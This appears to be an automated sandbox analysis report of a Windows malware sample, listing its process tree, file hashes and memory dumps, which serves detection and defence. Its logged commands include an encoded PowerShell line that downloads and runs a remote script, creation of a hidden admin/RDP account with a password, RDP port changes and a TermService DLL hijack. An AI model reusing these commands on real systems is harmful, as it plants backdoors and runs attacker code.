cmd.exe net.exe PID 4244 wrote to memory of 4168 4244 cmd.exe net.exe PID 4168 wrote to memory of 4160 4168 net.exe net1.exe PID 4168 wrote to memory of 4160 4168 net.exe net1.exe PID 4432 wrote to memory of 4560 4432 cmd.exe net.exe PID 4432 wrote to memory of 4560 4432 cmd.exe net.exe PID 4560 wrote to memory of 4576 4560 net.exe net1.exe PID 4560 wrote to memory of 4576 4560 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeC:\Users\Public\Documents\Wondershare\NFWCHK.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'4⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.cmdline"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4730.tmp" "c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\CSC811B30464E124A8BB81DC0AA3893821C.TMP"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f5⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 6B1GhkZz /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 6B1GhkZz /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 6B1GhkZz /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 6B1GhkZz1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 6B1GhkZz2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 6B1GhkZz3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES4730.tmpMD5
918e6777177726e9f4b8e62311c3f7ff
SHA180e487dd2c22c620b950f27a2856309332ac77a5
SHA2561d708f6c2134fe81b326b8d07994ae85934ab6796f8d81b5baf080701185aa83
SHA512444f2ec3782c9fcfbccffc93c3489be84e3dcb02d62e7c19b18ae19270449edf5bf76dd87d4a9784b0d3dd66e64c6b54273628817e1cd53b3f58d9feddad5bc4
-
C:\Users\Admin\AppData\Local\Temp\Setup.zipMD5
36f178576dcb8db35d6f06448b1eb510
SHA162277c90cc2b1bb81b36571037afe5081b0605d5
SHA256192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
SHA5129e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exeMD5
03051f3c44a2c8d196c95ea458b0aff4
SHA1d19a86e11cccdf978ca2d1455d7026d7879869f7
SHA256555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
SHA512883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exeMD5
03051f3c44a2c8d196c95ea458b0aff4
SHA1d19a86e11cccdf978ca2d1455d7026d7879869f7
SHA256555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
SHA512883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
43473f4e719958639a9d89e5d8388999
SHA1ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA5121051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
C:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.dllMD5
530ac98589c992e8b76d9d9d7306d513
SHA1568561e8895835f6bf9cbb6428d1f31ade4988fe
SHA2561d2bb8c42349a65afc31344d2d35d1f1e4d29099dbb8c84590e98a764ab65c51
SHA512551911896d9b70e4432a7b81dc4942f4aa901419045360b5debec2d61276cb4df5ad5269fba01abd6c4e66863525420868596b660525ec74ce324202ec9515fb
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.configMD5
ad0967a0ab95aa7d71b3dc92b71b8f7a
SHA1ed63f517e32094c07a2c5b664ed1cab412233ab5
SHA2569c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc
SHA51285766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b
-
\??\c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\CSC811B30464E124A8BB81DC0AA3893821C.TMPMD5
86852935139ed17789c2a9c597026ae6
SHA1f21e57653e0ddc6fbd30eecdb8eb6a485bc4ae3a
SHA256ae72f91c628f21307027bc08243dd44799e6131d33206291c2c7fb6dd4958fe8
SHA5125e7f9ca3b383603dee85e6720f05ce1a71bb46235a053144362f76796f6537ae04ff6cc3389807df36ba27410fc1dd97df25b1921cfe5d4ab35cb228da9578ff
-
\??\c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.cmdlineMD5
216e29c2b7df75e2ab7d14483718306c
SHA12914efd5305895b136167d03497dfe63179409ea
SHA256d0479dcacc294773d9f34e58b7660108a75c502c15cab49ad6f429f5c82d2a02
SHA51260aa8027f567a6fec0ec2c7a239ccff1a224c9c7109c89b7d49f5c8717b379ddc732ae905ec2ebe0bc46d6c4193182c535b507777f071b73b190a0c8df47f581
-
\Windows\Branding\mediasrv.pngMD5
271eacd9c9ec8531912e043bc9c58a31
SHA1c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA51287375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
-
\Windows\Branding\mediasvc.pngMD5
1fa9c1e185a51b6ed443dd782b880b0d
SHA150145abf336a196183882ef960d285bd77dd3490
SHA256f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA51216bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc
-
memory/680-366-0x0000000000000000-mapping.dmp
-
memory/988-125-0x0000000000000000-mapping.dmp
-
memory/1036-160-0x0000000000000000-mapping.dmp
-
memory/1752-150-0x00000222F25C3000-0x00000222F25C5000-memory.dmpFilesize
8KB
-
memory/1752-166-0x00000222F25C6000-0x00000222F25C8000-memory.dmpFilesize
8KB
-
memory/1752-145-0x00000222F2400000-0x00000222F2401000-memory.dmpFilesize
4KB
-
memory/1752-148-0x00000222F2750000-0x00000222F2751000-memory.dmpFilesize
4KB
-
memory/1752-149-0x00000222F25C0000-0x00000222F25C2000-memory.dmpFilesize
8KB
-
memory/1752-136-0x0000000000000000-mapping.dmp
-
memory/1752-173-0x00000222F3010000-0x00000222F3011000-memory.dmpFilesize
4KB
-
memory/1752-172-0x00000222F2C80000-0x00000222F2C81000-memory.dmpFilesize
4KB
-
memory/1752-164-0x00000222F2570000-0x00000222F2571000-memory.dmpFilesize
4KB
-
memory/1752-169-0x00000222F25C8000-0x00000222F25C9000-memory.dmpFilesize
4KB
-
memory/1868-114-0x0000000000680000-0x0000000000681000-memory.dmpFilesize
4KB
-
memory/1868-116-0x000000001B9F0000-0x000000001B9F2000-memory.dmpFilesize
8KB
-
memory/2100-137-0x0000000000000000-mapping.dmp
-
memory/2100-151-0x00000000009F0000-0x00000000009F2000-memory.dmpFilesize
8KB
-
memory/2392-214-0x00000235197C6000-0x00000235197C8000-memory.dmpFilesize
8KB
-
memory/2392-232-0x00000235197C8000-0x00000235197CA000-memory.dmpFilesize
8KB
-
memory/2392-180-0x0000000000000000-mapping.dmp
-
memory/2392-187-0x00000235197C0000-0x00000235197C2000-memory.dmpFilesize
8KB
-
memory/2392-188-0x00000235197C3000-0x00000235197C5000-memory.dmpFilesize
8KB
-
memory/2784-368-0x0000000000000000-mapping.dmp
-
memory/3160-117-0x0000000000000000-mapping.dmp
-
memory/3160-123-0x0000000001A30000-0x0000000001A31000-memory.dmpFilesize
4KB
-
memory/3160-122-0x0000000005B10000-0x0000000005B41000-memory.dmpFilesize
196KB
-
memory/3160-120-0x0000000000BF0000-0x0000000000BF1000-memory.dmpFilesize
4KB
-
memory/3204-371-0x0000000000000000-mapping.dmp
-
memory/3420-124-0x0000000000000000-mapping.dmp
-
memory/3420-129-0x0000020B69330000-0x0000020B695DA000-memory.dmpFilesize
2.7MB
-
memory/3420-132-0x0000020B69073000-0x0000020B69075000-memory.dmpFilesize
8KB
-
memory/3420-133-0x0000020B69075000-0x0000020B69076000-memory.dmpFilesize
4KB
-
memory/3420-134-0x0000020B69076000-0x0000020B69077000-memory.dmpFilesize
4KB
-
memory/3420-131-0x0000020B69070000-0x0000020B69072000-memory.dmpFilesize
8KB
-
memory/4016-157-0x0000000000000000-mapping.dmp
-
memory/4016-367-0x0000000000000000-mapping.dmp
-
memory/4100-365-0x0000000000000000-mapping.dmp
-
memory/4112-369-0x0000000000000000-mapping.dmp
-
memory/4120-370-0x0000000000000000-mapping.dmp
-
memory/4140-254-0x000002B01F326000-0x000002B01F328000-memory.dmpFilesize
8KB
-
memory/4140-295-0x000002B01F328000-0x000002B01F32A000-memory.dmpFilesize
8KB
-
memory/4140-223-0x0000000000000000-mapping.dmp
-
memory/4140-233-0x000002B01F320000-0x000002B01F322000-memory.dmpFilesize
8KB
-
memory/4140-234-0x000002B01F323000-0x000002B01F325000-memory.dmpFilesize
8KB
-
memory/4160-379-0x0000000000000000-mapping.dmp
-
memory/4168-378-0x0000000000000000-mapping.dmp
-
memory/4192-377-0x0000000000000000-mapping.dmp
-
memory/4204-470-0x0000000000000000-mapping.dmp
-
memory/4220-376-0x0000000000000000-mapping.dmp
-
memory/4312-374-0x0000000000000000-mapping.dmp
-
memory/4332-375-0x0000000000000000-mapping.dmp
-
memory/4396-469-0x0000000000000000-mapping.dmp
-
memory/4416-264-0x0000000000000000-mapping.dmp
-
memory/4416-298-0x0000022E9CC06000-0x0000022E9CC08000-memory.dmpFilesize
8KB
-
memory/4416-296-0x0000022E9CC00000-0x0000022E9CC02000-memory.dmpFilesize
8KB
-
memory/4416-297-0x0000022E9CC03000-0x0000022E9CC05000-memory.dmpFilesize
8KB
-
memory/4532-384-0x0000000000000000-mapping.dmp
-
memory/4560-380-0x0000000000000000-mapping.dmp
-
memory/4576-381-0x0000000000000000-mapping.dmp
-
memory/4636-382-0x0000000000000000-mapping.dmp
-
memory/4652-383-0x0000000000000000-mapping.dmp
-
memory/4664-385-0x0000000000000000-mapping.dmp
-
memory/4732-386-0x0000000000000000-mapping.dmp
-
memory/4832-321-0x0000000000000000-mapping.dmp
-
memory/4852-322-0x0000000000000000-mapping.dmp
-
memory/4872-323-0x0000000000000000-mapping.dmp
-
memory/4876-387-0x0000000000000000-mapping.dmp
-
memory/4940-388-0x0000000000000000-mapping.dmp
-
memory/4956-389-0x0000000000000000-mapping.dmp
-
memory/4956-396-0x0000027B2B883000-0x0000027B2B885000-memory.dmpFilesize
8KB
-
memory/4956-395-0x0000027B2B880000-0x0000027B2B882000-memory.dmpFilesize
8KB
-
memory/4956-404-0x0000027B2B886000-0x0000027B2B888000-memory.dmpFilesize
8KB
-
memory/4956-455-0x0000027B2B888000-0x0000027B2B889000-memory.dmpFilesize
4KB
-
memory/5052-360-0x0000000000000000-mapping.dmp
-
memory/5072-361-0x0000000000000000-mapping.dmp
-
memory/5104-364-0x0000000000000000-mapping.dmp